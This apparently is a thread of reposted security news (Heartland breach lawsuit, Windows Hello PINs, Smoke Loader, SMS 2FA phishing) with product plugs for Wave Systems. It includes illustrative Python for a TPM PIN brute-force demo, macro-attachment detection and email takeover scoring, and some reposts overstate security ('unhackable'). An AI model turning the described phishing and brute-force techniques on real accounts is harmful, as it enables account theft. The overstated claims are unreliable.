The lawsuit also mentions that in the aftermath of the hack, Visa conducted a review of Heartland's servers and found that Trustwave incorrectly certified Heartland as PCI DSS compliant. PCI DSS stands for Payment Card Industry Data Security Standard, an attestation every vendor must obtain before being allowed to handle credit card data.
The lawsuit claims that Visa discovered that Trustwave ignored the fact that Heartland didn't run a firewall, was using vendor-supplied passwords, didn't have sufficient protection for the storage system used for card data, failed to assign unique identification to each person accessing its system, and had failed to monitor servers and cardholder data at regular intervals.
All of these are PCI DSS compliance rules, and Visa said that despite all the problems on Heartland's network, Trustwave provided PCI DSS attestation. Visa later prohibited Heartland from employing Trustwave following the wrongful attestation.
Citing the Visa report and other post-breach documents, the two insurance firms claim that Trustwave is guilty of gross negligence. Furthermore, the lawsuit claims that Trustwave is also in breach of the contracts it signed with Heartland, for which it was supposed to provide security services. The two insurance firms are now asking for damages of at least $30 million, pending a jury trial, following Trustwave's failure to detect the intrusion.
Trustwave denies fault, says it's an old story
But in a statement to Bleeping Computer, Trustwave says the lawsuit is meritless.
"Trustwave filed a lawsuit in Delaware against insurers Lexington and Beazley in response to their time-barred and unwarranted attempt to recoup the insurance payments they made as coverage for a 2008 data breach at Heartland," a Trustwave spokesperson told us. "The insurers subsequently filed a duplicative suit in Illinois regarding the exact same matter."
"Trustwave provided Heartland with an assessment of its compliance with PCI DSS. However, such an assessment, as the contract at issue makes clear, in no way guarantees that the company examined has not or cannot be breached," the spokesperson added.
"Trustwave did not manage Heartland's information security, and at no time did Heartland assign blame for the breach or make any claim against Trustwave. The insurers' demand related to a decade-old breach is entirely without merit. Trustwave initiated the lawsuit in order to obtain a resolution of these baseless demands and intends to pursue this matter vigorously."
Trustwave was sued before in similar cases
This is the third time Trustwave is on the receiving end of such a lawsuit. A banking conglomerate sued Trustwave in 2014 for its role in the Target breach, but the lawsuit was dropped after a few days when it was discovered that Trustwave was not responsible for securing Target's payment card data, and hence, not at fault.
Trustwave was sued for a second time in 2016 when a casino operator claimed the security firm failed to contain and eradicate a 2013 breach of its payment system. The lawsuit claims Trustwave missed a second breach that later allowed a crook to steal over 300,000 payment card details from the casino operator's customers. This lawsuit is ongoing.
Senate Panel Announces Hearing on Computer Chip Flaws
Why not use the TPM to store sensitive data instead of having to continuously PATCH for Spectre and Meltdown? That method doesn't seem to be working and getting all new processors would take years to be absorbed into the market.
http://thehill.com/policy/cybersecurity/395878-senate-panel-announces-hearing-on-computer-chip-flaws
Netflix's Latest Price Test Could Be Bad News for Password Sharers
Wavexpress (Wave subsidiary) has closed up shop for quite some time but it is still an interesting technology in that the TPM could be a good device identifier for Netflix. imo. Steve Sprague years ago had indicated that cable was no longer being stolen due to hardware security. Maybe Netflix could license some of Wavexpress's technology given their new testing indicated in the article below.
https://www.thestreet.com/opinion/netflix-price-test-could-be-bad-news-for-password-sharers-14642914
The streaming giant is testing a pricing overhaul that would lower the number of simultaneous streams that are supported by two of its plans. That could give a lift to subscriptions and average prices.
It's an open secret that many Netflix (NFLX - Get Report) subscribers "share" their login credentials with friends and/or relatives.
If recent European tests are any sign, the streaming giant is finally thinking about cutting down on the behavior, by lowering the number of simultaneous streams supported by what are currently its two most expensive plans. And though such a move naturally risks sparking a consumer backlash, it could also provide a lift to Netflix's subscriber growth and average selling prices (ASPs) in the U.S. and some other developed markets.
Earlier this week, CordCutting.com and Italian site TuttoAndroid reported that Netflix is testing a pricing overhaul in European markets in which the company would launch an "Ultra" subscription plan that has the features of its current Premium plan, which costs €14 ($16.35) per month in a slew of European markets and $14 per month in the U.S. Like the current Premium plan, the Ultra plan lets accounts play up to four streams at the same time in either HD or (if a particular show or movie supports it) 4K resolution.
Notably, the Ultra plan is priced at €17 ($19.86) per month in the test. The Premium plan is still being offered, but only supports two simultaneous streams instead of the four that Premium subs currently enjoy. And Netflix's popular Standard plan -- which costs €11 ($12.85) or $11 per month in the U.S. and supports HD (but not 4K) streaming -- only supports one stream in the test, rather than the current two.
Users seeing the test aren't witnessing any changes to Netflix's Basic plan: It still costs €8 ($9.34) per month in Europe and $7.99 in the U.S. and supports one standard-definition stream.
A Netflix spokeswoman confirmed the test to CNET. "In this case, we are testing slightly different price points and features to better understand how consumers value Netflix," she said.
Clearly, if Netflix rolled out the pricing revamp on a large scale, Standard and (to some extent) Premium subs who are sharing their login credentials with other households would need to either think twice about doing so, or upgrade to a more expensive plan. And judging by both surveys and anecdotal evidence, the number of Netflix subs faced with that dilemma could be meaningful.
Last year, a U.S. Reuters survey found that 12% of adult streaming viewers admitted to "using an account/log-in information that belongs to someone outside your house." Among consumers aged 18 to 24, the figure rose to 21%. Assuming that some consumers were embarrassed to admit to such activity, Reuters's survey numbers might slightly understate how prevalent it is.
To date, Netflix has avoided cracking down on password-sharing, arguing that doing so risks snaring consumers engaged in "legitimate" sharing (for example, subscribers who share their log-ins with spouses or children). Lowering the number of streams supported by the Standard and Premium plans, though, would let the company reduce how much password-sharing occurs without engaging in a case-by-case crackdown that upsets "legitimate" sharers caught up in it.
And that, in turn, could drive an uptick in subscriptions among consumers borrowing someone else's login credentials. This could especially be a big deal in the U.S. -- both because of how common password-sharing has become here, and because high penetration rates have begun impacting its U.S. subscriber growth.
There are an estimated 126 million households in the U.S., and Netflix expects to end Q2 with 57.9 million U.S. streaming subscriptions. Exclude households that lack Internet access and/or can't afford Netflix, and the company's U.S. penetration rate is likely over 50% even before accounting for households using borrowed credentials. In addition, a December 2016 comScore survey found that 75% of U.S. Wi-Fi-connected homes subscribing to one or more over-the-top (OTT) streaming services included Netflix among them.
All of this makes it a good time for Netflix to try and coax U.S. password-borrowers to get their own subscriptions. Meanwhile, Netflix's very high customer satisfaction rates and still-reasonable pricing arguably position it well to convince households that need support for two or more simultaneous streams to keep their various Netflix-viewing members satisfied to sign up for a costlier plan.
Such upgrade activity would provide a fresh boost to Netflix's average selling price (ASP). With the help of the price hikes carried out last fall, Netflix's global ASP rose 14% annually in Q1, with 12% growth recorded in the U.S.
There is, of course, a risk that a broad rollout of Netflix's pricing overhaul in developed markets -- judging by how its latest price hike was rolled out, there's a good chance that Netflix will be more cautious in price-sensitive emerging markets -- would anger many consumers who have come to take their plan's support for two or four simultaneous streams for granted. However, with Netflix's plans remaining far cheaper than a typical pay-TV plan, and surveys indicating the company still has a fair amount of headroom to hike prices, the backlash might not be too severe.
Time will tell whether the pricing overhaul that Netflix is experimenting with in Europe becomes something more than a test. But either way, the fact that Netflix is even considering such a move speaks volumes about how confident the company remains about its pricing power and customer loyalty as Amazon.com (AMZN - Get Report) , Disney (DIS - Get Report) and others take their best shots at the streaming video giant.
PIN vs Password in Windows 10 – Which offers better security?
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.thewindowsclub.com/pin-vs-password-in-windows-10
Windows 10 introduced Windows Hello, allowing users to sign in to their device using a PIN or biometric identification. It revolutionized the concept of system security, bringing it to a level at which no system could be hacked remotely. However, Windows 10 also allows users to use a Password to log in. So which offers better security?
PIN vs Password in Windows 10
What is a Password?
A Password is a secret code which is stored on a server and can be used to access your account from any location, at least when speaking of computer-related accounts. Now they say that since servers have their own Firewalls which are powerful enough, these passwords cannot be hacked. However, this is untrue. A cyber-criminal doesn’t need to specifically access the server to figure out the password. Keylogging, phishing, etc. are a few of the known techniques to hack a person’s password without interfering with the server itself.
No matter how the password has been acquired, the intruder now has access to the user’s accounts from anywhere he/she chooses to access. One exception is if the user whose account was compromised was using a company based login where the information is stored in an active directory. In such a case, the hacker would have to access the original user’s account through any other system which is on the same network, which is difficult, though still possible.
Here’s where the concept of the PIN and biometric identification come to use. Windows Hello PIN and biometric identification are system specific. They are not stored on any server. While these logon types are not a substitute for a password, they are seemingly unhackable unless the cyber-criminal steals the device itself.
What is a PIN?
A PIN is an easy secret login code used to log in to your device. It is usually a set of numbers (mostly 4 digits), though some companies might allow their employees to use PINs with letters and special characters.
A PIN is tied to the device
A PIN is not stored on any server and is device specific. This means that if someone finds out your system’s PIN, the intruder would be able to get nothing out of it unless he/she steals the device as well. The PIN cannot be used on any other device belonging to the same person.
A PIN is backed up by TPM hardware
A Trusted Platform Module (TPM) is a hardware chip that has special security mechanisms to make it tamper proof. It has been made such that no known software attacks can hack it. E.g., PIN brute force won't work, since the TPM gets locked.
How does a PIN backed by the TPM work if someone steals your laptop?
Ideally, it would be an extremely rare case that a cybercriminal is able to steal your laptop and spoof its PIN, but well, considering that it's possible, the TPM uses an anti-hammering mechanism to block the PIN after repeated wrong attempts. If your device does not have a TPM, you can use BitLocker to limit the number of failed sign-in attempts, using the Group Policy Editor.
Why do users need to set a PIN before using biometric identification?
Be it a fingerprint, the retina of the eye or speech, injury on the body part used for biometric identification might lead to your device getting locked. Since people have a habit of not setting PINs unless forced to, Microsoft made it mandatory to set one before creating biometric identification.
Which is better among PIN and Password?
Honestly, this is a question that cannot be answered straight away. A PIN cannot be used for single sign-on structures like a password can. A password is insecure, and once it has been obtained through known attacks like phishing and keylogging, systems cannot be protected. Usually, servers offer extra protection like 2-step authentication, and IT departments in companies help change the password or block accounts the second they figure out that the password has been compromised. So the choice is yours, but generally speaking, a PIN does offer more security.
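The article's claim that a PIN is "tied to the device" and that brute force "won't work since the TPM gets locked" can be shown in code. The following is an added example, not code from the article or from Wave: a toy model of a TPM-protected PIN. Real Windows Hello unlocks a TPM-held private key with the PIN; the model stands in an HMAC derived from a chip-internal secret (assumed, non-exportable) for that key, and a fixed failure counter (assumed, max_failures) for the chip's dictionary-attack lockout. It contrasts an online guessing run against the chip with an offline run against a leaked, unsalted password hash.

```python
import hashlib
import hmac
import secrets
from typing import Optional


class TpmBackedPin:
    """Toy model of a TPM-protected Windows Hello PIN (constructed example).

    The chip holds a device-unique secret that is never exported; the PIN is
    only an authorization value that lets the chip use that secret. Wrong
    guesses are counted inside the chip and the lockout is enforced there,
    so the attacker cannot raise the guess rate by copying data off the device.
    """

    def __init__(self, pin: str, max_failures: int = 5) -> None:
        self._device_secret = secrets.token_bytes(32)  # assumed: chip-internal, non-exportable
        self._pin_digest = hashlib.sha256(pin.encode()).digest()
        self.max_failures = max_failures                 # assumed lockout threshold
        self.failures = 0
        self.locked_out = False

    def unseal(self, pin: str) -> Optional[bytes]:
        """Return the credential key if the PIN is correct and the chip is not locked out."""
        if self.locked_out:
            return None
        candidate = hashlib.sha256(pin.encode()).digest()
        if not hmac.compare_digest(candidate, self._pin_digest):
            self.failures += 1
            if self.failures >= self.max_failures:
                self.locked_out = True  # anti-hammering: refuse all further attempts
            return None
        self.failures = 0
        # The credential is derived from the chip secret, so the same PIN
        # enrolled on another device yields a different, useless key.
        return hmac.new(self._device_secret, b"credential-key", hashlib.sha256).digest()


def online_brute_force(tpm: TpmBackedPin, guesses) -> dict:
    """Guess PINs against the chip itself; stops as soon as it locks out."""
    attempts = 0
    for g in guesses:
        if tpm.locked_out:
            break
        attempts += 1
        if tpm.unseal(g) is not None:
            return {"found": g, "attempts": attempts, "locked_out": False}
    return {"found": None, "attempts": attempts, "locked_out": tpm.locked_out}


def offline_brute_force(password_digest: bytes, guesses) -> dict:
    """Contrast: a stolen server-side hash can be guessed with no rate limit at all."""
    attempts = 0
    for g in guesses:
        attempts += 1
        if hashlib.sha256(g.encode()).digest() == password_digest:
            return {"found": g, "attempts": attempts}
    return {"found": None, "attempts": attempts}


def demo() -> dict:
    guesses = [f"{n:04d}" for n in range(10000)]  # every 4-digit PIN, in order
    tpm = TpmBackedPin("4821")
    device_bound = online_brute_force(tpm, guesses)
    # Same PIN enrolled on a second device: the unsealed key differs, so a
    # leaked PIN is worthless without the hardware it was enrolled on.
    keys_differ = TpmBackedPin("4821").unseal("4821") != TpmBackedPin("4821").unseal("4821")
    # A leaked unsalted hash of the same 4-digit secret falls within seconds.
    leaked = offline_brute_force(hashlib.sha256(b"4821").digest(), guesses)
    return {"tpm": device_bound, "keys_differ": keys_differ, "offline": leaked}


if __name__ == "__main__":
    print(demo())
```

The model deliberately omits what a real chip adds on top (a recovery interval that decays the counter, and on Windows a reboot requirement after the PIN lockout trips); the point it does show is that the counter lives with the secret, so the attacker's budget is the chip's threshold, not their own hardware.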
This password-stealing malware just added a new way to infect your PC
See Wave VSC 2.0 at wavesys.com for a product that could help this situation in a BIG WAY. imo. Wave Endpoint Monitor (see wavesys.com as well) could also have a positive impact on this situation.
https://www.zdnet.com/article/this-password-stealing-malware-just-added-a-new-way-to-infect-your-pc/
One of the new tactics by the malware involves an injection technique not seen in the wild until just days ago
A powerful form of malware which can be used to distribute threats including Trojans, ransomware and malicious cryptocurrency mining software has been updated with a new technique which has rarely been seen in the wild.
Distributed in spam email phishing campaigns, Smoke Loader has been sporadically active since 2011 but has continually evolved. The malware has been particularly busy throughout 2018, with campaigns including the distribution of Smoke Loader via fake patches for the Meltdown and Spectre vulnerabilities which emerged earlier this year.
Like many malware campaigns, the initial attack is conducted via a malicious Microsoft Word attachment which tricks users into allowing macros, enabling Smoke Loader to be installed on the compromised system and allowing the Trojan to deliver additional malicious software.
Researchers at Cisco Talos have been tracking Smoke Loader for some time and have seen its latest campaigns in action. One of the current preferred payloads is TrickBot -- a banking Trojan designed to steal credentials, passwords and other sensitive information. Phishing emails distributing the malware are designed to look like invoice requests from a software firm.
What intrigued researchers is how Smoke Loader is now using an injection technique which hadn't been used to distribute malware until just days ago. The code injection technique is known as PROPagate and was first described as a potential means of compromise late last year.
This technique abuses the SetWindowsSubclass function -- a process used to install or update subclass windows running on the system -- and can be used to modify the properties of windows running in the same session. This can be used to inject code and drop files while also hiding the fact it has happened, making it a useful, stealthy attack.
It's likely that the attackers have observed publicly available posts on PROPagate in order to recreate the technique for their own malicious ends.
Those behind this process have also added anti-analysis techniques to complicate forensics, runtime AV scanners, tracing, and debugging that any researchers may attempt to conduct on the malware.
While there's still plenty of Smoke Loader attacks which look to deliver additional malware to compromised systems, in some cases the malware is being equipped with its own plug-ins to go straight onto performing its own malicious tasks.
Each of these plugins is designed to steal sensitive information, specifically stored credentials or sensitive information transferred over a browser -- the likes of Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird can all be used to steal data.
The malware can even be injected into applications like TeamViewer, potentially putting the credentials of others on the same network as the infected machine at risk too.
It's possible that Smoke Loader has been equipped with these tasks because its operators aren't currently getting much business in response to adverts on dark web forums advertising their ability to install other types of malware onto their compromised network of machines. It could also just be a means of taking advantage of the botnet for their own purposes.
Either way, it indicates that organisations must remain vigilant against potential threats.
"We have seen that the trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date," wrote Cisco Talos researchers.
"We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery of any such attack," they added.
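The article's initial access vector is a Word attachment that asks the user to enable macros. A mail gateway can refuse that class of attachment outright by looking at the file's content rather than its extension. The following is an added example, not code from the article or from Cisco Talos: a classifier for Office attachments that flags OOXML packages carrying a VBA project (either a vbaProject.bin part or a macro-enabled main content type), and hands legacy OLE2 binaries off for deeper inspection because their VBA lives in OLE streams that need a real parser. The sample documents it builds are constructed, minimal packages, not real Word output.

```python
import io
import zipfile

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # legacy .doc/.xls compound file header
MACRO_CONTENT_TYPES = (
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-word.template.macroEnabledTemplate.main+xml",
    "application/vnd.ms-office.vbaProject",
)


def classify_office_attachment(data: bytes) -> str:
    """Classify by content, never by file name.

    Returns one of 'ooxml-macro', 'ooxml-clean', 'ole2-legacy' or 'other'.
    """
    if data.startswith(OLE2_MAGIC):
        # Binary Word format: macros sit in OLE streams, so this needs a
        # dedicated parser (e.g. oletools); treat as "inspect further".
        return "ole2-legacy"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            # A renamed .docm still carries the VBA part inside the zip.
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return "ooxml-macro"
            if "[Content_Types].xml" in names:
                ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                if any(t in ct for t in MACRO_CONTENT_TYPES):
                    return "ooxml-macro"
                return "ooxml-clean"
    except zipfile.BadZipFile:
        pass
    return "other"


def build_sample_docx(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package, just enough structure for the classifier."""
    main_ct = (
        "application/vnd.ms-word.document.macroEnabled.main+xml"
        if with_macro
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00placeholder VBA project\x00")  # constructed bytes
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("macro", build_sample_docx(True)), ("clean", build_sample_docx(False))):
        print(label, "->", classify_office_attachment(blob))
```

Gating on the file name alone is the mistake this guards against: the zip is inspected whatever extension the sender chose, and the OLE2 branch exists so that old-format documents are not silently passed as "clean" just because they are not zips.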
UK CEOs believe cyber attacks are inevitable
A better, cost effective and unique set of cybersecurity products could prevent these cyber attacks from happening: see wavesys.com imo.
http://www.itpro.co.uk/security/31431/uk-ceos-believe-cyber-attacks-are-inevitable
KPMG survey finds that four in ten UK company bosses believe they will be targeted by cyber criminals
Four in ten UK CEOs believe it's no longer a case of "if" a cyber attack will happen as it is now an inevitability, according to research from KPMG.
The professional services firm surveyed 150 UK leaders and a further 1,150 CEOs from around the world about their future investment plans and the challenges facing their companies.
The results showed that 39% of UK CEOs believed that they will be targeted by a cyber attack. The percentage was higher globally, with almost half of international CEOs feeling the same way.
Bernard Brown, vice chair at KPMG in the UK, said that the findings show how high up the agenda cybersecurity has become for businesses.
"The seeming inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for the board-level discussions," he said.
"Protecting the business from a cyber attack has jumped further up the boardroom agenda and we are seeing businesses making their defences the best they can be."
The survey found that UK business leaders believe that a strong cybersecurity strategy is critical to engendering trust with key stakeholders, with 74% agreeing that cybersecurity is an enabler of trust, compared to 55% of global CEOs.
According to the report, cyber awareness amongst UK leaders is changing, with 39% believing that their organisations are either "very well" or "well" prepared for a future cyber attack.
CEOs also believe that cybersecurity specialists are an effective part of the business with 45% of UK CEOs seeing their value, coming second to data scientists who are seen as being effective by 62% of the CEOs asked.
"It's encouraging to see that CEOs are developing a more mature understanding of what cyber security actually means. They are beginning to ask more awkward and searching questions of their IT teams. What are the challenges that face us specifically, what risks are we carrying, what do we need to be resilient to a cyber-attack?" Brown added.
"Organisations are spending more time planning for worst case scenarios, running simulations and thinking in detail about how they would deal with the uncertainties that arise during a cyber breach."
More and more companies are becoming victims of cybercrime. In recent weeks, sports brand and trainer maker Adidas suffered a data breach that could have potentially exposed the personal details of millions of its customers.
‘Couldn’t recognize that fingerprint’ Windows Hello error
There seem to be a lot of time-consuming workarounds for the Windows Hello fingerprint reader technology. Seems like Wave VSC 2.0 would have had kinks like these already worked out. Windows Hello and Wave VSC 2.0 are somewhat similar technologies.
full article at the link.
https://windowsreport.com/fix-couldnt-recognize-fingerprint/
Excerpts:
With the introduction of Windows Hello, Microsoft added a few extra security layers with a few versatile biometric options. The fingerprint scanner is commonly used, and it’s held in high regards when it comes to its security value (look at all those smartphones). Once established, you’ll be able to go past the lock screen with just a touch. However, it seems that the fingerprint recognition failed for some users and they were acquainted with the “Couldn’t recognize that fingerprint” error.
And it hardly works with the same success with other OEMs. Thus, Microsoft Hello and the accompanying sign-in options display lots of bugs on Lenovo and Dell laptops. And, for that reason, you'll probably need to re-establish the fingerprint sign-in profile more times than you would like.
2: Use Local account and update Windows
The same reason. If Windows 10 update broke your fingerprint reader and it gives you the “Couldn’t recognize that fingerprint” error, you might look for alternatives. Lots of affected users managed to address the problem but, in exchange, they were able to use the fingerprint only on Local account instead of the Microsoft account.
4. Follow the instructions.
With that, we can conclude this article. We can only hope that these steps helped you resolve the “Couldn’t recognize that fingerprint” error in Windows Hello sign-in. If there is some additional information you consider useful, feel free to share it with us. The comments section is just below.
Two-Factor Inauthentication – The Rise In SMS Phishing Attacks
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/sites/wave/files/Wave%20Systems_Smart%20Card%202.0.pdf
https://www.informationsecuritybuzz.com/articles/two-factor-inauthentication-the-rise-in-sms-phishing-attacks/
There are countless ways to carry out a cyber attack, but for the vast majority the key is deception – typically involving identity deception in which the attacker poses as a trusted party to the intended victim.
With cyber criminals constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and companies. While various 2FA methods are available, the humble SMS text message has emerged as a favourite as it is incredibly ubiquitous and easy to understand.
Nevertheless, SMS also contains a number of inherent flaws as a security verification method. The first problem is that 2FA doesn’t actually verify the user’s identity, only that they have access. This means that anyone with direct access to the device can pass through 2FA security measures as they can send themselves the code.
The SMS phishing menace
Thieves and fraudsters don’t need to have the device in their hands, as 2FA is also vulnerable to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS and targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset their password for a particular user. Immediately afterwards, they send a fake text message to the same user, pretending to be the service provider and asking for the code “as an additional verification measure”.
In a research experiment I conducted with colleagues at New York University, we discovered that the VCFA technique can be incredibly effective – far more so than comparable email-based phishing attacks. We enlisted more than 300 volunteers who were not aware that the experiment involved SMS phishing, and sent them a variety of different messages designed after real SMS from their email provider. The most successful message was able to fool 50 percent of recipients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non-targeted email-based phishing attacks have a success rate of around 1 percent, with the very best reaching two or three percent.
Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else connected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known as Email Account Compromise (EAC). While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used in much more subtle and insidious ways.
EAC emails are far more difficult to detect than normal fraudulent messages, as they lack potential tells such as mismatched sender IDs. The good news is that they are not entirely unstoppable, and it is possible to detect and prevent an EAC email by looking even deeper into different elements associated with the identity of the legitimate user. For example, an email security system could be set up to detect details about the user agent – the device used to send the email. So, a user could normally use a Mac with a 2560 × 1600 screen resolution, while the imposter who has hijacked their account might use a PC with a 1440 × 900 resolution.
This difference can be identified through the email itself, along with other signs such as the IP address. Taken together, these clues can point to a suspicious email even when the account address is genuine. The email can then be flagged for further examination to determine if there really is a malicious actor at work, or if the CEO happens to be using his or her spouse's PC for the afternoon.
Can 2FA be saved?
The most obvious solution to the many security flaws in SMS 2FA is to abandon the text message as a verification measure – something I expect to see happening with increasing frequency over the next year.
Although SMS 2FA is certainly on the way out, it will be some time before the change filters through all organisations thanks to its simplicity and popularity. While SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organisations to be aware that their workforce’s digital identities may be compromised. Enterprises must be prepared for the threat of an employee’s email being hijacked via 2FA and used to attack them from within.
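The detection idea in the article (compare the sending device and IP address against what the legitimate account holder normally uses, and flag only when the clues add up) is shown below as an added example; it is not code from the article or its author. Screen resolution is not carried in standard mail headers, so the example uses the User-Agent or X-Mailer header and the originating IP (X-Originating-IP, falling back to the earliest Received hop). The per-user baseline and the three messages are constructed; the threshold of two clues is an assumed tuning choice that lets the "CEO on the spouse's PC" case through while still catching a hijacked account driven from an unfamiliar client and network.

```python
import email
import ipaddress
from email.message import Message
from email.utils import parseaddr
from typing import Dict, List

# Constructed baseline (assumed data): what the real account holder sends from.
BASELINE: Dict[str, dict] = {
    "alice@example.com": {
        "user_agents": {"Apple Mail (2.3445.104.11)"},
        "networks": [ipaddress.ip_network("203.0.113.0/24")],  # office range
    },
}
SUSPICIOUS_THRESHOLD = 2  # assumed: flag when at least two clues disagree with the baseline


def originating_ip(msg: Message) -> str:
    """Prefer X-Originating-IP; otherwise use the earliest Received hop."""
    xo = msg.get("X-Originating-IP")
    if xo:
        return xo.strip("[] ")
    received = msg.get_all("Received") or []
    if received:
        first_hop = received[-1]  # Received headers are prepended, so the last is the earliest
        start = first_hop.find("[")
        end = first_hop.find("]", start)
        if start != -1 and end != -1:
            return first_hop[start + 1:end]
    return ""


def score_message(raw: str) -> dict:
    """Compare one message's client and origin against the sender's baseline."""
    msg = email.message_from_string(raw)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    ua = (msg.get("User-Agent") or msg.get("X-Mailer") or "").strip()
    ip = originating_ip(msg)
    reasons: List[str] = []
    profile = BASELINE.get(sender)
    if profile is None:
        reasons.append("no baseline for sender")
    else:
        if ua and ua not in profile["user_agents"]:
            reasons.append(f"unseen user agent: {ua}")
        try:
            addr = ipaddress.ip_address(ip)
            if not any(addr in net for net in profile["networks"]):
                reasons.append(f"origin outside baseline networks: {ip}")
        except ValueError:
            reasons.append("no usable originating IP")
    return {
        "message_id": msg.get("Message-ID", "").strip(),
        "sender": sender,
        "reasons": reasons,
        "suspicious": len(reasons) >= SUSPICIOUS_THRESHOLD,
    }


def analyze(messages: List[str]) -> List[dict]:
    return [score_message(m) for m in messages]


# Constructed sample messages: usual client and network; spouse's PC on the home
# network (one clue only); hijacked account driven from a new client and IP.
SAMPLE_MESSAGES = [
    "\n".join([
        "From: Alice <alice@example.com>", "To: bob@example.com",
        "Subject: Q3 numbers", "Message-ID: <1@example.com>",
        "User-Agent: Apple Mail (2.3445.104.11)", "X-Originating-IP: [203.0.113.25]",
        "", "Attached.", "",
    ]),
    "\n".join([
        "From: Alice <alice@example.com>", "To: bob@example.com",
        "Subject: Re: Q3 numbers", "Message-ID: <2@example.com>",
        "X-Mailer: Microsoft Windows Live Mail 16.4", "X-Originating-IP: [203.0.113.40]",
        "", "Using the other machine this afternoon.", "",
    ]),
    "\n".join([
        "From: Alice <alice@example.com>", "To: bob@example.com",
        "Subject: Urgent wire transfer", "Message-ID: <3@example.com>",
        "X-Mailer: Microsoft Outlook 16.0",
        "Received: from mail.example.com by mx.example.net; Thu, 19 Jul 2018 10:00:00 +0000",
        "Received: from unknown [198.51.100.7] by mail.example.com; Thu, 19 Jul 2018 09:59:58 +0000",
        "", "Please process the attached invoice today.", "",
    ]),
]

if __name__ == "__main__":
    for r in analyze(SAMPLE_MESSAGES):
        print(r["message_id"], "SUSPICIOUS" if r["suspicious"] else "ok", r["reasons"])
```

Message 2 still produces one reason, which is worth surfacing as a low-priority signal rather than discarding; the threshold only decides what gets flagged for analyst review, not what gets logged.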